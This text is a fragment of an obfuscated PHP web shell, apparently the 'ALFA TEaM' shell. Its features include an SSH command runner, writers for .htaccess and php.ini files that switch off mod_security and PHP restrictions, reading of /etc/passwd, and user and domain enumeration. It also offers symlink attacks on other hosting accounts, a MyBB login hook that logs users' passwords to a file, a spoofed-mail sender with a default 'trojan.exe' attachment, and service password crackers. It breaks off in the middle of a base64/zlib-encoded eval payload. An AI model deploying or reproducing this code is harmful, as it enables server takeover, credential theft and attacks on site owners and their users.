$ssh_login . "","" . $ssh_pass . "","" . $ssh_port . "",this.ssh_command.value,">>"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>"; goto cq4I4; Ae82G: echo "</div>"; goto h6msp; cq4I4: $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command); goto ZH4A4; DSpqf: alfahead(); goto X4ClQ; ZH4A4: stream_set_blocking($alfastream, true); goto urL0L; urL0L: $output = ssh2_fetch_stream($alfastream, SSH2_STREAM_STDIO); goto ijBIE; h6msp: alfafooter(); goto pNsGR; pNsGR: } goto i_UhK; i_UhK: } else { goto bvYK2; TNKIL: alfafooter(); goto Rl6BC; AJnU6: echo "<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>"; goto TNKIL; bvYK2: alfahead(); goto AJnU6; Rl6BC: } } goto UNM1M; zatc1: $XDmfxOnhck = "fu" . "nct" . "ion" . "_" . "e" . "x" . "is" . "ts" . ''; goto RFckQ; gM0bI: function alfasafe() { goto L4Keo; iVAwS: echo "<br></div>"; goto Kux6T; k64wG: if (!empty($_POST["alfa6"]) && isset($_POST["alfa6"]) == "valiases") { echo "
<form onsubmit="g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>"; if (isset($_POST["alfa9"]) && $_POST["alfa9"] == ">>") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { goto VpBbx; a1Hvk: if (!empty($user) && $user != "root") { echo __pre() . "<center><table border='1'><tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">{$user}</font></b></td></tr><tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; } else { echo __pre() . "<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>"; } goto YoSfc; cBy6x: $rep = str_replace(array("https://", "http://", "www."), '', $site); goto RDUAA; RDUAA: $user = ''; goto V52zt; VpBbx: $site = trim($_POST["alfa7"]); goto cBy6x; V52zt: if (function_exists("posix_getpwuid") && function_exists("fileowner")) { if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) { $user = $user["name"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep); } } goto a1Hvk; YoSfc: } else { goto v66np; v66np: $site = trim($_POST["alfa7"]); goto oFWp6; oFWp6: $rep = str_replace(array("https://", "http://", "www."), '', $site); goto sDZsh; sDZsh: $users = _alfa_file("/etc/virtual/domainowners"); goto DUnw_; DUnw_: foreach ($users as $boz) { $ex = explode(":", $boz); if ($ex[0] == $rep) { echo __pre() . "<center><table border='1'>
\xa<tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">" . trim($ex[1]) . "</font></b></td></tr>\xd\xa<tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; break; } } goto iDz3l; iDz3l: } } } goto GBzmh; HW43v: if (!empty($_POST["alfa2"]) && isset($_POST["alfa2"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible
<IfModule mod_security.c>
Sec------Engine Off\xaSec------ScanPOST Off
</IfModule>"); echo "<center><b><big>htaccess for Apache created...!</center></b></big>"; } goto rB3Sp; lpNgp: if (!empty($_POST["alfa3"]) && isset($_POST["alfa3"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible
<Files *.php>\xaForceType application/x-httpd-php4\xa</Files>
<IfModule mod_security.c>\xaSecFilterEngine Off
SecFilterScanPOST Off\xa</IfModule>"); echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>"; } goto iVAwS; rB3Sp: if (!empty($_POST["alfa1"]) && isset($_POST["alfa1"])) { @__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF
disable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)"); echo "<center><b><big> php.ini created...!</center></b></big>"; } goto lpNgp; fs_iB: echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>"; goto hHL1K; L4Keo: alfahead(); goto fs_iB; Kux6T: alfafooter(); goto toNMr; hHL1K: echo "<h3><a href=javascript:void(0) onclick="g('safe',null,'php.ini',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g('safe',null,null,'ini')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,'pl')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,'passwd')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,'users')">| Read-Users | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,'valiases')">| Get-User | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,null,null,'domains')">| Get-Domains | </a></center></h3>"; goto zKjbR; zKjbR: if (!empty($_POST["alfa8"]) && isset($_POST["alfa8"]) == "domains") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { goto IxjQi; O1lD9: if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("zone", $solevisible13)) { preg_match_all("#zone "(.*)"#", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "<br>"; } } } } goto D2K40; IxjQi: echo __pre(); goto uqdId; uqdId: $solevisible9 = _alfa_file("/etc/named.conf"); goto O1lD9; D2K40: } else { goto sN_ct; nscsa: $users = _alfa_file("/etc/virtual/domainowners"); goto n4oAN; n4oAN: if (is_array($users)) { foreach ($users as $boz) { $dom = explode(":", $boz); echo $dom[0] . "\xa"; } } goto HjnLL; sN_ct: echo __pre(); goto nscsa; HjnLL: } } goto k64wG; AOg4o: if (!empty($_POST["alfa4"]) && isset($_POST["alfa4"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("/etc/passwd"); } elseif (function_exists("posix_getpwuid")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}:"; } echo "
"; } } } else { __alert("failed..."); } } goto HW43v; GBzmh: if (!empty($_POST["alfa5"]) && isset($_POST["alfa5"])) { if (!_alfa_file_exists("/etc/virtual/domainowners")) { goto neO9I; QtBf9: while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "
"; break; } } $i++; } goto g9qoT; neO9I: echo __pre(); goto Dr9Q8; Dr9Q8: $i = 0; goto QtBf9; g9qoT: } else { goto QIMWv; UXqGt: $users = _alfa_file("/etc/virtual/domainowners"); goto g4f2H; QIMWv: echo __pre(); goto UXqGt; g4f2H: foreach ($users as $boz) { $user = explode(":", $boz); echo trim($user[1]) . "<br>"; } goto m39hC; m39hC: } } goto AOg4o; toNMr: } goto veOxe; QZJSD: function hijackMybb($path, $saveto) { goto vOMut; CY9CF: $code = str_replace("{saveto_path}", $saveto, $code); goto JeiC3; rWxsA: $evil_login = "	" . $code . "\xa	" . $find; goto oON1h; vOMut: $code = "$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = '".$user['username']."'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user['username']." : ". $user['password']." ( ".$alfa_fetch['email']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);"; goto ss1k8; oON1h: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { goto OKhfN; OKhfN: $login_replace = str_replace($find, $evil_login, $data_login); goto FI2uU; tj8_o: hijackOutput(0, $saveto); goto aL7JB; FI2uU: @file_put_contents($login, $login_replace); goto tj8_o; aL7JB: } else { hijackOutput(1); } } else { hijackOutput(1); } goto LZtGk; JeiC3: $login = $path . "/member.php"; goto rWxsA; ss1k8: $find = "$loginhandler->complete_login();"; goto CY9CF; LZtGk: } goto a111_; OTgQa: $GLOBALS["NeUSMyPGXP"] = array("usmfzmlHFCje" => "admin", "paLDRhHfAovu" => "a6f452ec3293d7fb72c5b677257b20ec", "saEuEgnDlHuL" => "1", "logXKTfQPNcx" => "gui", "shiJVQhUrFkw" => "1", "pogkUzMiAjqB" => true); goto zatc1; MYobS: function _alfa_symlink($target, $link) { $phpsym = function_exists("symlink"); if ($phpsym) { @symlink($target, $link); } else { alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'"); } } goto a6F74; ZkSgh: function alfamail() { goto mzVVK; geA4g: echo "<div class=header>"; goto pD2ao; YgOkp: echo "<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g('mail',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,'>>',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">"; goto RVXLx; klkRS: echo "<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>"; goto bnAH5; piMfE: alfafooter(); goto axgM8; bnAH5: if (isset($_POST["alfa4"]) && $_POST["alfa4"] == ">>") { goto G8EKz; X3kFz: $mail_from = $_POST["alfa2"]; goto zzKxl; ONdWM: $count_mail = (int) $_POST["alfa6"]; goto MR9_B; ySa2U: if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) { goto w1tnM; s4kZa: if (!empty($mail_from)) { echo __pre(); for ($i = 1; $i <= $count_mail; $i++) { if (@mail($mail_to, $mail_subject, $mail_content, $headers)) { echo "<center>Sent -> {$mail_to}<br></center>"; } } } else { __alert("Invalid Mail From !"); } goto EBwOR; w1tnM: if (!empty($mail_attach) && @is_file($mail_attach)) { goto QYwRr; Mzlmy: $mail_content .= "Content-Type: application/octet-stream; name="" . $filename . ""\xd
"; goto ZzzS9; OPXUI: $headers .= "MIME-Version: 1.0" . "
\xa"; goto byqEo; CO2UT: $mail_content .= "Content-type:text/plain; charset=iso-8859-1\xd
"; goto jt6nN; TUbt9: $headers .= "Reply-To: " . $mail_from . "
"; goto ODeam; mCLD1: $content = __read_file($file); goto M1zfS; tycuj: $mail_content .= "Content-Disposition: attachment; filename="" . $filename . ""\xd

\xa"; goto xJL3B; h2Hh9: $mail_content .= $mail_content . "

\xa"; goto La31o; zLL76: $uid = md5(uniqid(time())); goto wIGK3; z5MAC: $mail_content = "--" . $uid . "
"; goto CO2UT; xJL3B: $mail_content .= $content . "
\xa
"; goto in32s; QYwRr: $file = $mail_attach; goto mCLD1; ODeam: $headers .= "Content-Type: multipart/mixed; boundary="" . $uid . ""\xd\xa
"; goto OPXUI; SHHAG: $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \xd
"; goto TUbt9; ZzzS9: $mail_content .= "Content-Transfer-Encoding: base64
"; goto tycuj; in32s: $mail_content .= "--" . $uid . "--"; goto uFhZT; M1zfS: $content = chunk_split(__ZW5jb2Rlcg($content)); goto zLL76; La31o: $mail_content .= "--" . $uid . "\xd
"; goto Mzlmy; wIGK3: $filename = basename($file); goto yEtdc; byqEo: $headers .= "X-Mailer: php" . "
"; goto z5MAC; jt6nN: $mail_content .= "Content-Transfer-Encoding: 7bit\xd\xa\xd\xa"; goto h2Hh9; yEtdc: $headers = "From: " . $mail_from . " <" . $mail_from . ">\xd
"; goto SHHAG; uFhZT: } else { goto cGUiS; FeF6a: $headers .= "MIME-Version: 1.0" . "
\xa"; goto Nr30P; Nr30P: $headers .= "X-Mailer: php" . "
\xa"; goto epU3p; LuWgw: $headers .= "Content-type: text/html; charset=utf-8" . "
\xa"; goto FeF6a; siLLy: $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) 
"; goto he5O1; he5O1: $headers .= "Reply-To: " . $mail_from . '' . "
"; goto LuWgw; cGUiS: $headers = "From: " . $mail_from . " ( " . $mail_from . " ) 
"; goto siLLy; epU3p: } goto XH_bm; XH_bm: if (empty($count_mail) || $count_mail < 1) { $count_mail = 1; } goto s4kZa; EBwOR: } else { __alert("Invalid Mail To !"); } goto tBR1Q; PYpR3: $mail_content = $_POST["alfa5"]; goto ONdWM; G8EKz: $mail_to = $_POST["alfa1"]; goto X3kFz; MR9_B: $mail_attach = $_POST["alfa7"]; goto ySa2U; zzKxl: $mail_subject = $_POST["alfa3"]; goto PYpR3; tBR1Q: } goto ouaPh; RVXLx: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mail To : ", "inputName" => "mail_to", "inputValue" => "[email protected]", "inputSize" => "60", "placeholder" => true), "td2" => array("color" => "FFFFFF", "tdName" => "From : ", "inputName" => "mail_from", "inputValue" => "[email protected]", "inputSize" => "60", "placeholder" => true), "td3" => array("color" => "FFFFFF", "tdName" => "Subject : ", "inputName" => "mail_subject", "inputValue" => "your site hacked by me", "inputSize" => "60"), "td4" => array("color" => "FFFFFF", "tdName" => "Attach File : ", "inputName" => "mail_attach", "inputValue" => $GLOBALS["cwd"] . "trojan.exe", "inputSize" => "60"), "td5" => array("color" => "FFFFFF", "tdName" => "Count Mail : ", "inputName" => "count_mail", "inputValue" => "1", "inputSize" => "60")); goto TK8xA; TK8xA: create_table($table); goto klkRS; mzVVK: alfahead(); goto geA4g; ouaPh: echo "</div>"; goto piMfE; pD2ao: AlfaNum(8, 9, 10); goto YgOkp; axgM8: } goto AZtgr; tgUps: $GLOBALS["__file_path"] = str_replace("\", "/", trim(preg_replace("!\(\d+\)\s.*!", '', __FILE__))); goto fyd7O; ojyU9: if (!isset($GLOBALS["DB_NAME"]["user"])) { exit("$GLOBALS['DB_NAME']['user']"); } goto DvW2j; jF6QH: function Alfa_Call_Function_Cracker($method, $info) { switch ($method) { case "cp": return Alfa_CP_Cracker($info); break; case "direct": case "phpmyadmin": return Alfa_DirectAdmin_Cracker($info); break; case "ftp": return Alfa_FTP_Cracker($info); break; case "mysql": return Alfa_Mysql_Cracker($info); break; case "mysql": return Alfa_FTPC($info); break; } } goto P67H4; DWLcl: function alfaproc() { goto q4KjS; LoqkT: alfafooter(); goto GUl5P; BZc7o: echo "<Div class=header><br><center>"; goto nsMEl; Y7QC1: echo "</center><br>"; goto H5aYc; nsMEl: if (empty($_POST["ajax"]) && !empty($_POST["alfa1"])) { $_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } goto sqAu0; ugNIm: echo "</div>"; goto LoqkT; sqAu0: if ($GLOBALS["sys"] == "win") { $process = array("Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab"); } goto C9ltr; q4KjS: alfahead(); goto BZc7o; H5aYc: if (!empty($_POST["alfa1"])) { goto nVVIO; Uh7KO: echo alfaEx($cmd . $_POST["alfa1"]); goto NPW9E; nVVIO: echo "<pre class='ml1' style='margin-top:5px' >"; goto qwOBI; qwOBI: if (isset($GLOBALS["glob_chdir_false"]) && !empty($_POST["c"])) { $cmd = "cd '" . addslashes($_POST["c"]) . "';"; } goto Uh7KO; NPW9E: echo "</pre>"; goto sbbMt; sbbMt: } goto ugNIm; C9ltr: foreach ($process as $n => $link) { echo "<a href="javascript:void(0);" onclick="g('proc',null,'" . $link . "')"> | " . $n . " | </a>"; } goto Y7QC1; GUl5P: } goto gM0bI; mMKnX: function __ZW5jb2Rlcg($s) { return nIWUkxhnhj($s); } goto J3y62; e_w5I: function alfasymlink() { goto BCTc0; lCIzh: echo "<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g('symlink',null,null,'symphp')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,'symperl')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,'sympy')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,null,null,'SymFile')">| File Symlink | </a></h3></center>"; goto NXfiu; S3_Qf: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "symphp") { goto Xzg3X; wXe2r: echo "</center></table>"; goto loB2c; Xzg3X: $cant_symlink = true; goto xWJE_; AfsmT: if ($cant_symlink) { echo "<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>"; } goto wXe2r; xWJE_: if (function_exists("symlink") || _alfa_can_runCommand(false, false)) { goto NTiWm; NTiWm: @mkdir("alfasymlink", 0777); goto y2UZK; HUOn4: if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) { goto UKMm_; S7c1c: $template = "<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>"; goto cdOXM; GltVh: $lines = array(); goto VI0C4; k8ye9: echo $table_header; goto Wmaeq; Py4mT: $error = false; goto aUGom; VnspA: $f_black = array(); goto Py4mT; X2zKo: $state = $domains["state"]; goto LReLk; VI0C4: $anony_domains = array(); goto dSDP7; KiAWq: $can_runcmd = _alfa_can_runCommand(false, false); goto jSzn3; dSDP7: $anonymous_users = array(); goto VnspA; K6zg0: $lines = $domains["lines"]; goto X2zKo; Eqpn8: $domains = alfaGetDomains(); goto K6zg0; GAvhT: $cant_symlink = false; goto msCs1; wLTWD: if ($anonymous) { foreach ($anonymous_users as $owner) { goto Kn2Le; tR4_W: echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template); goto jE8CH; Kn2Le: $sympath = str_replace("{user}", $owner, $makepwd); goto s40fH; jE8CH: $count++; goto HgjLF; s40fH: $http = "javascript:alert('we cant find domain...')"; goto tR4_W; HgjLF: } } goto GAvhT; jSzn3: if (!$is_posix && !$can_runcmd) { goto jYAnq; jYAnq: $anonymous = true; goto YN1Dz; RUyQl: $lines = _alfa_file("/etc/passwd"); goto gV6fL; YN1Dz: $anony_domains = $domains["lines"]; goto RUyQl; gV6fL: } goto k8ye9; dKWCX: $makepwd = "/home/{user}/public_html/"; goto Eqpn8; UKMm_: echo "<center>"; goto GltVh; LReLk: $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner"); goto KiAWq; aUGom: $anonymous = false; goto dKWCX; cdOXM: foreach ($lines as $line) { goto GthqW; IF7_z: if ($anonymous) { goto MEWsF; Fs3Dy: $temp_black = array(); goto KoVDY; iMdU8: if ((int) $userid < 500) { continue; } goto DqPOk; KoVDY: $finded = false; goto jfIxS; DqPOk: $domain = "[?????]"; goto Fs3Dy; yKVT6: $userid = $explode[2]; goto iMdU8; jfIxS: foreach ($anony_domains as $anony) { goto Qh4Rw; z4FnP: $sub_domain = str_replace(array("-", "."), '', $domain); goto X8abx; Qh4Rw: if ($state == "named.conf") { if (@strstr($anony, "zone")) { preg_match_all("#zone "(.*)"#", $anony, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { goto DLofd; EkyYR: if ($state == "named") { $anony = rtrim($anony, ".db"); } goto Mu7bM; DLofd: if ($anony == "." || $anony == "..") { continue; } goto EkyYR; Mu7bM: $domain = $anony; goto ENyrM; ENyrM: } goto z4FnP; X8abx: if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) { goto hvc0v; aMQE1: $sympath = str_replace("{user}", $owner, $makepwd); goto oK7Dy; UP3dd: $count++; goto AAB1O; oK7Dy: $http = "http://" . $domain; goto z4jnl; kedhG: $finded = true; goto qwLbJ; hvc0v: if (in_array($owner . $domain, $temp_black)) { continue; } goto aMQE1; AAB1O: $temp_black[] = $owner . $domain; goto kedhG; z4jnl: echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); goto UP3dd; qwLbJ: } goto HUy5t; HUy5t: } goto EKD0S; EAeAb: $owner = $explode[0]; goto z9NJc; EKD0S: if (!$finded) { $anonymous_users[] = $owner; } goto zMz6j; z9NJc: $owner_len = strlen($owner) - 1; goto yKVT6; MEWsF: $explode = explode(":", $line); goto EAeAb; zMz6j: } else { if ($state == "named.conf") { if (@strstr($line, "zone")) { preg_match_all("#zone "(.*)"#", $line, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { goto suxO9; suxO9: if ($line == "." || $line == "..") { continue; } goto d3t52; d3t52: if ($state == "named") { $line = rtrim($line, ".db"); } goto F597t; F597t: $domain = $line; goto VXynE; VXynE: } if (strlen(trim($domain)) > 2 && $state != "passwd") { if (!_alfa_file_exists("/etc/valiases/" . $domain, false)) { continue; } if ($is_posix) { $user = @posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); $owner = $user["name"]; } elseif ($can_runcmd) { $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false); } } } goto o5Z_T; o5Z_T: if (!$anonymous) { goto SX9bZ; X46Cw: $sympath = str_replace("{user}", $owner, $makepwd); goto vM5gh; uz3RL: echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); goto teE3k; vM5gh: $http = "http://" . $domain; goto S2LX0; teE3k: $count++; goto HiFzh; HiFzh: $f_black[] = $owner . $domain; goto vemtw; SX9bZ: if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) { continue; } goto X46Cw; S2LX0: if ($state == "passwd") { $http = "javascript:alert('we cant find domain...')"; } goto uz3RL; vemtw: } goto mbyH5; GthqW: $domain = ''; goto YJgpJ; YJgpJ: $owner = ''; goto IF7_z; mbyH5: } goto wLTWD; Wmaeq: $count = 1; goto S7c1c; msCs1: } else { goto KBEFQ; iy2C0: $count = 1; goto JrFyS; VKMbT: $sole = _alfa_file("/etc/virtual/domainowners"); goto iy2C0; f20Ti: if (_alfa_file_exists("/etc/virtual/domainowners")) { $makepwd = "/home/{user}/public_html"; $is_direct = true; } goto VKMbT; t1WHv: if ($sole) { foreach ($sole as $visible) { if (@strstr($visible, ":")) { goto FX8Ex; FX8Ex: $solevisible = explode(":", $visible); goto iZmAb; mdDfm: echo str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); goto JNUAC; iZmAb: $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd); goto mdDfm; JNUAC: } } } else { $passwd = _alfa_file("/etc/passwd"); if ($passwd) { goto Rw9Yn; gOCzi: foreach ($site_domains as $line) { if ($is_named) { if (@strstr($line, "zone")) { goto tgg7K; tgg7K: preg_match_all("#zone "(.*)"#", $line, $data); goto FG0fJ; FG0fJ: $domain = $data[1][0]; goto sgMDF; sgMDF: if (strlen($domain > 2) && !empty($domain)) { $domains[] = $domain; } goto uew7M; uew7M: } } else { $domains[] = $line; } } goto n6Ko7; szG6P: if (!$site_domains) { goto NAIii; NAIii: $site_domains = alfaEx("ls /etc/virtual/"); goto jngrd; jngrd: $site_domains = explode("\xa", $site_domains); goto K5lDU; K5lDU: if (!$site_domains) { $site_domains = _alfa_file("/etc/named.conf"); if ($site_domains) { $is_named = true; } } goto PHUwp; PHUwp: } goto gOCzi; He6dT: $site_domains = @scandir("/etc/virtual/"); goto szG6P; bFU86: $users = array(); goto KAtSd; KAtSd: $domains = array(); goto rDYuM; lltrc: foreach ($uknowns as $user => $home) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template); } goto SjnwV; QUUcr: foreach ($passwd as $user) { goto gdSS2; WCVRt: $users[$expl[0]] = $expl[5]; goto YCWHt; gdSS2: $user = trim($user); goto pKSeg; pKSeg: $expl = explode(":", $user); goto tmQfI; tmQfI: if ((int) $expl[2] < 500) { continue; } goto WCVRt; YCWHt: } goto He6dT; SM_Va: foreach ($users as $user => $home) { foreach ($domains as $domain) { goto moQgy; moQgy: $user_len = strlen($user) - 1; goto uLJXR; oUBfA: $five_user = substr($user, 0, $user_len); goto bpi0l; bpi0l: $five_domain = substr($sub_domain, 0, $user_len); goto eTTEh; eTTEh: if ($five_user == $five_domain) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template); } else { $uknowns[$user] = $home; } goto VFAj6; uLJXR: $sub_domain = str_replace(array("-", "."), '', $domain); goto oUBfA; VFAj6: } } goto ruriQ; ICDqu: $is_named = false; goto bFU86; Rw9Yn: $html = ''; goto ICDqu; n6Ko7: $x = 1; goto SM_Va; SjnwV: echo $html; goto adCPv; rDYuM: $uknowns = array(); goto QUUcr; ruriQ: $uknowns = array_unique($uknowns); goto lltrc; adCPv: } } goto Cj4SH; Qis60: $makepwd = alfaMakePwd(); goto f20Ti; KBEFQ: $is_direct = false; goto Qis60; LqzSL: $cant_symlink = false; goto JOxNp; JrFyS: echo $table_header; goto SJK47; Cj4SH: echo "</table>"; goto LqzSL; SJK47: $template = "<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>"; goto t1WHv; JOxNp: } goto Sd00h; y2UZK: alfacgihtaccess("sym", "alfasymlink/"); goto hmyZh; nhSHu: $table_header = "<pre id="strOutput" style="margin-top:5px" class="ml1"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>"; goto HUOn4; hmyZh: _alfa_symlink("/", "alfasymlink/root"); goto nhSHu; Sd00h: } else { echo "<pre class=ml1 style='margin-top:5px'><b><font color="#FFFFFF">[+] Symlink Function Disabled !</b></font></pre></center>"; $cant_symlink = false; } goto AfsmT; loB2c: } goto K33Os; NXfiu: if (isset($_POST["alfa2"]) && ($_POST["alfa2"] == "symperl" || $_POST["alfa2"] == "sympy")) { goto CUPvn; tJTcG: if (strlen($resource) == 0) { echo AlfaiFrameCreator("cgialfa/" . $cginame); } else { echo $resource; } goto T8qCL; XnaGI: echo __pre(); goto Ya7an; NHXca: $py = "#!/usr/bin/python" . "\xaimport zlib, base64\xa" . "eval(compile(zlib.decompress(base64.b64decode("eJydWG1v2zYQ/mz/ClZFZntxJDvY9sFxPGRpshXo2mHNMAyJIdAibWuRRYGkY3tF99t3xxdJtpW0mD5YFHnvvHt4tJa7UbuVrgohNUkWqZ61W+YV8pzOMt7ttfk24YUGqoIq1W47Wp2uuB8L5UdqVw5luVxsWLu9yMSMZjGMySUJAv+9lpn9fvsxvv75LYxvaaY4qJmDWDDiKZUiD5dUxY981w1+vrq7+fPqr/jt+7ub32+vrm+CHlhWMt/JNW9zEACTexrBsJDKxdP9cFquON3gLs3mNArabcbnZME18nQLoVA02OGlO9tgsiW5XsucVCoMIbAgVcBSyRMdECFJF5woqF6GqZqnEM4g4jqJcrriLExEPg96hOaMVFTA64ieaJZSxVUU9Ho1nUG0FCsefVorLj9HxXqWpUm81KsMHGgBN5hQi9x98ObD9R+/3ry/i3//8OEumIaqyFINKoIe7KjhBgbkCwtRwHa36mOv80R5hScqICcE+cO/RZp3kbrXJ1ZSz4ZwRR+5lt1ErHPdJ0ysaJr3CfL3SbJh6M1S6wKDj+9RFAWnChgsZc/E0o5NOO9/xGcaYBAcX+dv+kRVIlNITJpxCQ5tOElorsk8hXha7jAMg14H3JQpLARjLYnSu4xfdjTf6jOI7yIfJTzXXF50JmPNJuO5AMpEZEJedl7fwjMYdibWOuNO7zQYR0g0GUdIr1mDyIzPNQqkZCn5/LJj+dF0YO8QDYnI9WUnnmU0f+wcKB0Mrs7PB16pC0lNKy01N1h7e+sZMdrHxh7aVFUC0GIVqN0qS/PHCMfFzn2FeqtdDGD3ToPoSz5A2ODpTD5a/iPbIy0nkK0mWZiInRpfcqudK9p6KQIs0TyWnLLYVI8v9laqYsh0vaZZOfVEZUlk4aRl4yg2OTcF4ma5lFCj5afnuQeMAIO4cmM2QzeTxyxV2k3Vqt1wmeTcM8XJPDbbL2gDva1Skyh43oAPITIbGizIlkVjcmNeqciN